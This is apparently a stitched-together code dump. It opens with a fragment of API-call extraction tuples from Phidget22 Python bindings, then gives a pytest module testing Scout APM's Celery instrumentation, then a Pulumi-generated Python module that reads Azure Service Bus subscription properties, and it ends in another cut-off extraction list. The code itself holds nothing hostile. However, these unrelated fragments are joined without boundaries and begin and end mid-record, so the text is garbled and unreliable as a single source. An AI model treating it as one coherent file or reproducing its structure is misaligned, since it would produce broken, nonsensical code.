15025), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((15131, 15154), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (15152, 15154), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((15276, 15300), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (15292, 15300), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((15368, 15391), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (15389, 15391), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((15477, 15500), 'ctypes.byref', 'ctypes.byref', (['_IsRemote'], {}), '(_IsRemote)\n', (15489, 15500), False, 'import ctypes\n'), ((15529, 15553), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (15545, 15553), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((15664, 15687), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (15685, 15687), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((15811, 15835), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (15827, 15835), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((15866, 15889), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (15887, 15889), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((15995, 16019), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (16011, 16019), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((16115, 16138), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (16136, 16138), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((16271, 16295), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (16287, 16295), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((16362, 16385), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (16383, 16385), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((16469, 16490), 'ctypes.byref', 'ctypes.byref', (['_Parent'], {}), '(_Parent)\n', (16481, 16490), False, 'import ctypes\n'), ((16519, 16543), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (16535, 16543), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((16695, 16718), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (16716, 16718), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((16810, 16839), 'ctypes.byref', 'ctypes.byref', (['_ServerHostname'], {}), '(_ServerHostname)\n', (16822, 16839), False, 'import ctypes\n'), ((16868, 16892), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (16884, 16892), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((17014, 17037), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (17035, 17037), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((17125, 17150), 'ctypes.byref', 'ctypes.byref', (['_ServerName'], {}), '(_ServerName)\n', (17137, 17150), False, 'import ctypes\n'), ((17179, 17203), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (17195, 17203), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((17371, 17394), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (17392, 17394), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((17482, 17507), 'ctypes.byref', 'ctypes.byref', (['_ServerName'], {}), '(_ServerName)\n', (17494, 17507), False, 'import ctypes\n'), ((17536, 17560), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (17552, 17560), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((17643, 17666), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (17664, 17666), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((17758, 17787), 'ctypes.byref', 'ctypes.byref', (['_ServerPeerName'], {}), '(_ServerPeerName)\n', (17770, 17787), False, 'import ctypes\n'), ((17816, 17840), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (17832, 17840), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((17974, 17997), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (17995, 17997), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((18091, 18122), 'ctypes.byref', 'ctypes.byref', (['_ServerUniqueName'], {}), '(_ServerUniqueName)\n', (18103, 18122), False, 'import ctypes\n'), ((18151, 18175), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (18167, 18175), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((18315, 18338), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (18336, 18338), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((18434, 18467), 'ctypes.byref', 'ctypes.byref', (['_MaxVINTDeviceSpeed'], {}), '(_MaxVINTDeviceSpeed)\n', (18446, 18467), False, 'import ctypes\n'), ((18496, 18520), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (18512, 18520), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((18659, 18682), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (18680, 18682), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((18786, 18827), 'ctypes.byref', 'ctypes.byref', (['_VINTDeviceSupportsSetSpeed'], {}), '(_VINTDeviceSupportsSetSpeed)\n', (18798, 18827), False, 'import ctypes\n'), ((18856, 18880), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (18872, 18880), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((19054, 19077), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (19075, 19077), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((19168, 19194), 'ctypes.byref', 'ctypes.byref', (['_deviceLabel'], {}), '(_deviceLabel)\n', (19180, 19194), False, 'import ctypes\n'), ((19223, 19247), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (19239, 19247), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((1890, 1913), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (1911, 1913), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((1946, 1969), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (1967, 1969), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((2632, 2655), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (2653, 2655), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((3175, 3198), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (3196, 3198), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((3790, 3813), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (3811, 3813), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((4483, 4506), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (4504, 4506), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n')] |
# coding=utf-8
from __future__ import absolute_import, division, print_function, unicode_literals
from contextlib import contextmanager
import celery
import pytest
from celery.signals import setup_logging
import scout_apm.celery
from scout_apm.api import Config
# http://docs.celeryproject.org/en/latest/userguide/testing.html#py-test
skip_unless_celery_4_plus = pytest.mark.skipif(
celery.VERSION < (4, 0), reason="pytest fixtures added in Celery 4.0"
)
@setup_logging.connect
def do_nothing(**kwargs):
# Just by connecting to this signal, we prevent Celery from setting up
# logging - and stop it from interfering with global state
# http://docs.celeryproject.org/en/v4.3.0/userguide/signals.html#setup-logging
pass
@contextmanager
def app_with_scout(app=None, config=None):
"""
Context manager that configures a Celery app with Scout installed.
"""
if app is None:
app = celery.Celery("tasks", broker="memory://")
# Enable Scout by default in tests.
if config is None:
config = {"monitor": True}
# Disable running the agent.
config["core_agent_launch"] = False
@app.task
def hello():
return "Hello World!"
# Setup according to https://docs.scoutapm.com/#celery
Config.set(**config)
scout_apm.celery.install()
try:
yield app
finally:
scout_apm.celery.uninstall()
# Reset Scout configuration.
Config.reset_all()
def test_hello_eager(tracked_requests):
with app_with_scout() as app:
result = app.tasks["tests.integration.test_celery.hello"].apply()
assert result.result == "Hello World!"
assert len(tracked_requests) == 1
tracked_request = tracked_requests[0]
assert "task_id" in tracked_request.tags
assert tracked_request.tags["is_eager"] is True
assert tracked_request.tags["exchange"] == "unknown"
assert tracked_request.tags["routing_key"] == "unknown"
assert tracked_request.tags["queue"] == "unknown"
assert tracked_request.active_spans == []
assert len(tracked_request.complete_spans) == 1
span = tracked_request.complete_spans[0]
assert span.operation == "Job/tests.integration.test_celery.hello"
@skip_unless_celery_4_plus
def test_hello_worker(celery_app, celery_worker, tracked_requests):
with app_with_scout(app=celery_app) as app:
result = app.tasks["tests.integration.test_celery.hello"].delay().get()
assert result == "Hello World!"
assert len(tracked_requests) == 1
tracked_request = tracked_requests[0]
assert "task_id" in tracked_request.tags
assert tracked_request.tags["is_eager"] is False
assert tracked_request.tags["exchange"] == ""
assert tracked_request.tags["routing_key"] == "celery"
assert tracked_request.tags["queue"] == "unknown"
assert (
0.0 <= tracked_request.tags["queue_time"] < 60.0
) # Assume test took <60 seconds
assert tracked_request.active_spans == []
assert len(tracked_request.complete_spans) == 1
span = tracked_request.complete_spans[0]
assert span.operation == "Job/tests.integration.test_celery.hello"
@skip_unless_celery_4_plus
def test_hello_worker_header_preset(celery_app, celery_worker, tracked_requests):
with app_with_scout(app=celery_app) as app:
result = (
app.tasks["tests.integration.test_celery.hello"]
.apply_async(headers={"scout_task_start": "an evil string"})
.get()
)
assert result == "Hello World!"
assert len(tracked_requests) == 1
tracked_request = tracked_requests[0]
assert tracked_request.active_spans == []
assert len(tracked_request.complete_spans) == 1
span = tracked_request.complete_spans[0]
assert span.operation == "Job/tests.integration.test_celery.hello"
assert "queue_time" not in span.tags
@skip_unless_celery_4_plus
def test_hello_worker_chain(celery_app, celery_worker, tracked_requests):
with app_with_scout(app=celery_app) as app:
hello = app.tasks["tests.integration.test_celery.hello"]
result = (hello.si() | hello.si()).apply_async().get()
assert result == "Hello World!"
assert len(tracked_requests) == 2
assert [t.complete_spans[0].operation for t in tracked_requests] == [
"Job/tests.integration.test_celery.hello",
"Job/tests.integration.test_celery.hello",
]
assert "parent_task_id" not in tracked_requests[0].tags
first_task_id = tracked_requests[0].tags["task_id"]
assert tracked_requests[1].tags["parent_task_id"] == first_task_id
def test_no_monitor(tracked_requests):
# With an empty config, "monitor" defaults to False.
with app_with_scout(config={}) as app:
result = app.tasks["tests.integration.test_celery.hello"].apply()
assert result.result == "Hello World!"
assert tracked_requests == []
| [
"scout_apm.api.Config.set",
"celery.Celery",
"scout_apm.api.Config.reset_all",
"pytest.mark.skipif"
] | [((367, 461), 'pytest.mark.skipif', 'pytest.mark.skipif', (['(celery.VERSION < (4, 0))'], {'reason': '"""pytest fixtures added in Celery 4.0"""'}), "(celery.VERSION < (4, 0), reason=\n 'pytest fixtures added in Celery 4.0')\n", (385, 461), False, 'import pytest\n'), ((1268, 1288), 'scout_apm.api.Config.set', 'Config.set', ([], {}), '(**config)\n', (1278, 1288), False, 'from scout_apm.api import Config\n'), ((926, 968), 'celery.Celery', 'celery.Celery', (['"""tasks"""'], {'broker': '"""memory://"""'}), "('tasks', broker='memory://')\n", (939, 968), False, 'import celery\n'), ((1443, 1461), 'scout_apm.api.Config.reset_all', 'Config.reset_all', ([], {}), '()\n', (1459, 1461), False, 'from scout_apm.api import Config\n')] |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = [
'GetSubscriptionResult',
'AwaitableGetSubscriptionResult',
'get_subscription',
]
@pulumi.output_type
class GetSubscriptionResult:
"""
Description of subscription resource.
"""
def __init__(__self__, accessed_at=None, auto_delete_on_idle=None, client_affine_properties=None, count_details=None, created_at=None, dead_lettering_on_filter_evaluation_exceptions=None, dead_lettering_on_message_expiration=None, default_message_time_to_live=None, duplicate_detection_history_time_window=None, enable_batched_operations=None, forward_dead_lettered_messages_to=None, forward_to=None, id=None, is_client_affine=None, lock_duration=None, max_delivery_count=None, message_count=None, name=None, requires_session=None, status=None, system_data=None, type=None, updated_at=None):
if accessed_at and not isinstance(accessed_at, str):
raise TypeError("Expected argument 'accessed_at' to be a str")
pulumi.set(__self__, "accessed_at", accessed_at)
if auto_delete_on_idle and not isinstance(auto_delete_on_idle, str):
raise TypeError("Expected argument 'auto_delete_on_idle' to be a str")
pulumi.set(__self__, "auto_delete_on_idle", auto_delete_on_idle)
if client_affine_properties and not isinstance(client_affine_properties, dict):
raise TypeError("Expected argument 'client_affine_properties' to be a dict")
pulumi.set(__self__, "client_affine_properties", client_affine_properties)
if count_details and not isinstance(count_details, dict):
raise TypeError("Expected argument 'count_details' to be a dict")
pulumi.set(__self__, "count_details", count_details)
if created_at and not isinstance(created_at, str):
raise TypeError("Expected argument 'created_at' to be a str")
pulumi.set(__self__, "created_at", created_at)
if dead_lettering_on_filter_evaluation_exceptions and not isinstance(dead_lettering_on_filter_evaluation_exceptions, bool):
raise TypeError("Expected argument 'dead_lettering_on_filter_evaluation_exceptions' to be a bool")
pulumi.set(__self__, "dead_lettering_on_filter_evaluation_exceptions", dead_lettering_on_filter_evaluation_exceptions)
if dead_lettering_on_message_expiration and not isinstance(dead_lettering_on_message_expiration, bool):
raise TypeError("Expected argument 'dead_lettering_on_message_expiration' to be a bool")
pulumi.set(__self__, "dead_lettering_on_message_expiration", dead_lettering_on_message_expiration)
if default_message_time_to_live and not isinstance(default_message_time_to_live, str):
raise TypeError("Expected argument 'default_message_time_to_live' to be a str")
pulumi.set(__self__, "default_message_time_to_live", default_message_time_to_live)
if duplicate_detection_history_time_window and not isinstance(duplicate_detection_history_time_window, str):
raise TypeError("Expected argument 'duplicate_detection_history_time_window' to be a str")
pulumi.set(__self__, "duplicate_detection_history_time_window", duplicate_detection_history_time_window)
if enable_batched_operations and not isinstance(enable_batched_operations, bool):
raise TypeError("Expected argument 'enable_batched_operations' to be a bool")
pulumi.set(__self__, "enable_batched_operations", enable_batched_operations)
if forward_dead_lettered_messages_to and not isinstance(forward_dead_lettered_messages_to, str):
raise TypeError("Expected argument 'forward_dead_lettered_messages_to' to be a str")
pulumi.set(__self__, "forward_dead_lettered_messages_to", forward_dead_lettered_messages_to)
if forward_to and not isinstance(forward_to, str):
raise TypeError("Expected argument 'forward_to' to be a str")
pulumi.set(__self__, "forward_to", forward_to)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if is_client_affine and not isinstance(is_client_affine, bool):
raise TypeError("Expected argument 'is_client_affine' to be a bool")
pulumi.set(__self__, "is_client_affine", is_client_affine)
if lock_duration and not isinstance(lock_duration, str):
raise TypeError("Expected argument 'lock_duration' to be a str")
pulumi.set(__self__, "lock_duration", lock_duration)
if max_delivery_count and not isinstance(max_delivery_count, int):
raise TypeError("Expected argument 'max_delivery_count' to be a int")
pulumi.set(__self__, "max_delivery_count", max_delivery_count)
if message_count and not isinstance(message_count, float):
raise TypeError("Expected argument 'message_count' to be a float")
pulumi.set(__self__, "message_count", message_count)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if requires_session and not isinstance(requires_session, bool):
raise TypeError("Expected argument 'requires_session' to be a bool")
pulumi.set(__self__, "requires_session", requires_session)
if status and not isinstance(status, str):
raise TypeError("Expected argument 'status' to be a str")
pulumi.set(__self__, "status", status)
if system_data and not isinstance(system_data, dict):
raise TypeError("Expected argument 'system_data' to be a dict")
pulumi.set(__self__, "system_data", system_data)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
if updated_at and not isinstance(updated_at, str):
raise TypeError("Expected argument 'updated_at' to be a str")
pulumi.set(__self__, "updated_at", updated_at)
@property
@pulumi.getter(name="accessedAt")
def accessed_at(self) -> str:
"""
Last time there was a receive request to this subscription.
"""
return pulumi.get(self, "accessed_at")
@property
@pulumi.getter(name="autoDeleteOnIdle")
def auto_delete_on_idle(self) -> Optional[str]:
"""
ISO 8061 timeSpan idle interval after which the topic is automatically deleted. The minimum duration is 5 minutes.
"""
return pulumi.get(self, "auto_delete_on_idle")
@property
@pulumi.getter(name="clientAffineProperties")
def client_affine_properties(self) -> Optional['outputs.SBClientAffinePropertiesResponse']:
"""
Properties specific to client affine subscriptions.
"""
return pulumi.get(self, "client_affine_properties")
@property
@pulumi.getter(name="countDetails")
def count_details(self) -> 'outputs.MessageCountDetailsResponse':
"""
Message count details
"""
return pulumi.get(self, "count_details")
@property
@pulumi.getter(name="createdAt")
def created_at(self) -> str:
"""
Exact time the message was created.
"""
return pulumi.get(self, "created_at")
@property
@pulumi.getter(name="deadLetteringOnFilterEvaluationExceptions")
def dead_lettering_on_filter_evaluation_exceptions(self) -> Optional[bool]:
"""
Value that indicates whether a subscription has dead letter support on filter evaluation exceptions.
"""
return pulumi.get(self, "dead_lettering_on_filter_evaluation_exceptions")
@property
@pulumi.getter(name="deadLetteringOnMessageExpiration")
def dead_lettering_on_message_expiration(self) -> Optional[bool]:
"""
Value that indicates whether a subscription has dead letter support when a message expires.
"""
return pulumi.get(self, "dead_lettering_on_message_expiration")
@property
@pulumi.getter(name="defaultMessageTimeToLive")
def default_message_time_to_live(self) -> Optional[str]:
"""
ISO 8061 Default message timespan to live value. This is the duration after which the message expires, starting from when the message is sent to Service Bus. This is the default value used when TimeToLive is not set on a message itself.
"""
return pulumi.get(self, "default_message_time_to_live")
@property
@pulumi.getter(name="duplicateDetectionHistoryTimeWindow")
def duplicate_detection_history_time_window(self) -> Optional[str]:
"""
ISO 8601 timeSpan structure that defines the duration of the duplicate detection history. The default value is 10 minutes.
"""
return pulumi.get(self, "duplicate_detection_history_time_window")
@property
@pulumi.getter(name="enableBatchedOperations")
def enable_batched_operations(self) -> Optional[bool]:
"""
Value that indicates whether server-side batched operations are enabled.
"""
return pulumi.get(self, "enable_batched_operations")
@property
@pulumi.getter(name="forwardDeadLetteredMessagesTo")
def forward_dead_lettered_messages_to(self) -> Optional[str]:
"""
Queue/Topic name to forward the Dead Letter message
"""
return pulumi.get(self, "forward_dead_lettered_messages_to")
@property
@pulumi.getter(name="forwardTo")
def forward_to(self) -> Optional[str]:
"""
Queue/Topic name to forward the messages
"""
return pulumi.get(self, "forward_to")
@property
@pulumi.getter
def id(self) -> str:
"""
Resource Id
"""
return pulumi.get(self, "id")
@property
@pulumi.getter(name="isClientAffine")
def is_client_affine(self) -> Optional[bool]:
"""
Value that indicates whether the subscription has an affinity to the client id.
"""
return pulumi.get(self, "is_client_affine")
@property
@pulumi.getter(name="lockDuration")
def lock_duration(self) -> Optional[str]:
"""
ISO 8061 lock duration timespan for the subscription. The default value is 1 minute.
"""
return pulumi.get(self, "lock_duration")
@property
@pulumi.getter(name="maxDeliveryCount")
def max_delivery_count(self) -> Optional[int]:
"""
Number of maximum deliveries.
"""
return pulumi.get(self, "max_delivery_count")
@property
@pulumi.getter(name="messageCount")
def message_count(self) -> float:
"""
Number of messages.
"""
return pulumi.get(self, "message_count")
@property
@pulumi.getter
def name(self) -> str:
"""
Resource name
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="requiresSession")
def requires_session(self) -> Optional[bool]:
"""
Value indicating if a subscription supports the concept of sessions.
"""
return pulumi.get(self, "requires_session")
@property
@pulumi.getter
def status(self) -> Optional[str]:
"""
Enumerates the possible values for the status of a messaging entity.
"""
return pulumi.get(self, "status")
@property
@pulumi.getter(name="systemData")
def system_data(self) -> 'outputs.SystemDataResponse':
"""
The system meta data relating to this resource.
"""
return pulumi.get(self, "system_data")
@property
@pulumi.getter
def type(self) -> str:
"""
Resource type
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="updatedAt")
def updated_at(self) -> str:
"""
The exact time the message was updated.
"""
return pulumi.get(self, "updated_at")
class AwaitableGetSubscriptionResult(GetSubscriptionResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetSubscriptionResult(
accessed_at=self.accessed_at,
auto_delete_on_idle=self.auto_delete_on_idle,
client_affine_properties=self.client_affine_properties,
count_details=self.count_details,
created_at=self.created_at,
dead_lettering_on_filter_evaluation_exceptions=self.dead_lettering_on_filter_evaluation_exceptions,
dead_lettering_on_message_expiration=self.dead_lettering_on_message_expiration,
default_message_time_to_live=self.default_message_time_to_live,
duplicate_detection_history_time_window=self.duplicate_detection_history_time_window,
enable_batched_operations=self.enable_batched_operations,
forward_dead_lettered_messages_to=self.forward_dead_lettered_messages_to,
forward_to=self.forward_to,
id=self.id,
is_client_affine=self.is_client_affine,
lock_duration=self.lock_duration,
max_delivery_count=self.max_delivery_count,
message_count=self.message_count,
name=self.name,
requires_session=self.requires_session,
status=self.status,
system_data=self.system_data,
type=self.type,
updated_at=self.updated_at)
def get_subscription(namespace_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
subscription_name: Optional[str] = None,
topic_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetSubscriptionResult:
"""
Description of subscription resource.
:param str namespace_name: The namespace name
:param str resource_group_name: Name of the Resource group within the Azure subscription.
:param str subscription_name: The subscription name.
:param str topic_name: The topic name.
"""
__args__ = dict()
__args__['namespaceName'] = namespace_name
__args__['resourceGroupName'] = resource_group_name
__args__['subscriptionName'] = subscription_name
__args__['topicName'] = topic_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:servicebus/v20210601preview:getSubscription', __args__, opts=opts, typ=GetSubscriptionResult).value
return AwaitableGetSubscriptionResult(
accessed_at=__ret__.accessed_at,
auto_delete_on_idle=__ret__.auto_delete_on_idle,
client_affine_properties=__ret__.client_affine_properties,
count_details=__ret__.count_details,
created_at=__ret__.created_at,
dead_lettering_on_filter_evaluation_exceptions=__ret__.dead_lettering_on_filter_evaluation_exceptions,
dead_lettering_on_message_expiration=__ret__.dead_lettering_on_message_expiration,
default_message_time_to_live=__ret__.default_message_time_to_live,
duplicate_detection_history_time_window=__ret__.duplicate_detection_history_time_window,
enable_batched_operations=__ret__.enable_batched_operations,
forward_dead_lettered_messages_to=__ret__.forward_dead_lettered_messages_to,
forward_to=__ret__.forward_to,
id=__ret__.id,
is_client_affine=__ret__.is_client_affine,
lock_duration=__ret__.lock_duration,
max_delivery_count=__ret__.max_delivery_count,
message_count=__ret__.message_count,
name=__ret__.name,
requires_session=__ret__.requires_session,
status=__ret__.status,
system_data=__ret__.system_data,
type=__ret__.type,
updated_at=__ret__.updated_at)
| [
"pulumi.get",
"pulumi.getter",
"pulumi.set",
"pulumi.InvokeOptions",
"pulumi.runtime.invoke"
] | [((6398, 6430), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""accessedAt"""'}), "(name='accessedAt')\n", (6411, 6430), False, 'import pulumi\n'), ((6624, 6662), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""autoDeleteOnIdle"""'}), "(name='autoDeleteOnIdle')\n", (6637, 6662), False, 'import pulumi\n'), ((6937, 6981), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""clientAffineProperties"""'}), "(name='clientAffineProperties')\n", (6950, 6981), False, 'import pulumi\n'), ((7242, 7276), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""countDetails"""'}), "(name='countDetails')\n", (7255, 7276), False, 'import pulumi\n'), ((7470, 7501), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""createdAt"""'}), "(name='createdAt')\n", (7483, 7501), False, 'import pulumi\n'), ((7669, 7732), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""deadLetteringOnFilterEvaluationExceptions"""'}), "(name='deadLetteringOnFilterEvaluationExceptions')\n", (7682, 7732), False, 'import pulumi\n'), ((8048, 8102), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""deadLetteringOnMessageExpiration"""'}), "(name='deadLetteringOnMessageExpiration')\n", (8061, 8102), False, 'import pulumi\n'), ((8389, 8435), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""defaultMessageTimeToLive"""'}), "(name='defaultMessageTimeToLive')\n", (8402, 8435), False, 'import pulumi\n'), ((8850, 8907), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""duplicateDetectionHistoryTimeWindow"""'}), "(name='duplicateDetectionHistoryTimeWindow')\n", (8863, 8907), False, 'import pulumi\n'), ((9230, 9275), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""enableBatchedOperations"""'}), "(name='enableBatchedOperations')\n", (9243, 9275), False, 'import pulumi\n'), ((9521, 9572), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""forwardDeadLetteredMessagesTo"""'}), "(name='forwardDeadLetteredMessagesTo')\n", (9534, 9572), False, 'import pulumi\n'), ((9812, 9843), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""forwardTo"""'}), "(name='forwardTo')\n", (9825, 9843), False, 'import pulumi\n'), ((10167, 10203), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""isClientAffine"""'}), "(name='isClientAffine')\n", (10180, 10203), False, 'import pulumi\n'), ((10438, 10472), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""lockDuration"""'}), "(name='lockDuration')\n", (10451, 10472), False, 'import pulumi\n'), ((10705, 10743), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""maxDeliveryCount"""'}), "(name='maxDeliveryCount')\n", (10718, 10743), False, 'import pulumi\n'), ((10931, 10965), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""messageCount"""'}), "(name='messageCount')\n", (10944, 10965), False, 'import pulumi\n'), ((11272, 11309), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""requiresSession"""'}), "(name='requiresSession')\n", (11285, 11309), False, 'import pulumi\n'), ((11749, 11781), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""systemData"""'}), "(name='systemData')\n", (11762, 11781), False, 'import pulumi\n'), ((12135, 12166), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""updatedAt"""'}), "(name='updatedAt')\n", (12148, 12166), False, 'import pulumi\n'), ((1293, 1341), 'pulumi.set', 'pulumi.set', (['__self__', '"""accessed_at"""', 'accessed_at'], {}), "(__self__, 'accessed_at', accessed_at)\n", (1303, 1341), False, 'import pulumi\n'), ((1510, 1574), 'pulumi.set', 'pulumi.set', (['__self__', '"""auto_delete_on_idle"""', 'auto_delete_on_idle'], {}), "(__self__, 'auto_delete_on_idle', auto_delete_on_idle)\n", (1520, 1574), False, 'import pulumi\n'), ((1760, 1834), 'pulumi.set', 'pulumi.set', (['__self__', '"""client_affine_properties"""', 'client_affine_properties'], {}), "(__self__, 'client_affine_properties', client_affine_properties)\n", (1770, 1834), False, 'import pulumi\n'), ((1987, 2039), 'pulumi.set', 'pulumi.set', (['__self__', '"""count_details"""', 'count_details'], {}), "(__self__, 'count_details', count_details)\n", (1997, 2039), False, 'import pulumi\n'), ((2181, 2227), 'pulumi.set', 'pulumi.set', (['__self__', '"""created_at"""', 'created_at'], {}), "(__self__, 'created_at', created_at)\n", (2191, 2227), False, 'import pulumi\n'), ((2479, 2601), 'pulumi.set', 'pulumi.set', (['__self__', '"""dead_lettering_on_filter_evaluation_exceptions"""', 'dead_lettering_on_filter_evaluation_exceptions'], {}), "(__self__, 'dead_lettering_on_filter_evaluation_exceptions',\n dead_lettering_on_filter_evaluation_exceptions)\n", (2489, 2601), False, 'import pulumi\n'), ((2819, 2921), 'pulumi.set', 'pulumi.set', (['__self__', '"""dead_lettering_on_message_expiration"""', 'dead_lettering_on_message_expiration'], {}), "(__self__, 'dead_lettering_on_message_expiration',\n dead_lettering_on_message_expiration)\n", (2829, 2921), False, 'import pulumi\n'), ((3113, 3199), 'pulumi.set', 'pulumi.set', (['__self__', '"""default_message_time_to_live"""', 'default_message_time_to_live'], {}), "(__self__, 'default_message_time_to_live',\n default_message_time_to_live)\n", (3123, 3199), False, 'import pulumi\n'), ((3424, 3532), 'pulumi.set', 'pulumi.set', (['__self__', '"""duplicate_detection_history_time_window"""', 'duplicate_detection_history_time_window'], {}), "(__self__, 'duplicate_detection_history_time_window',\n 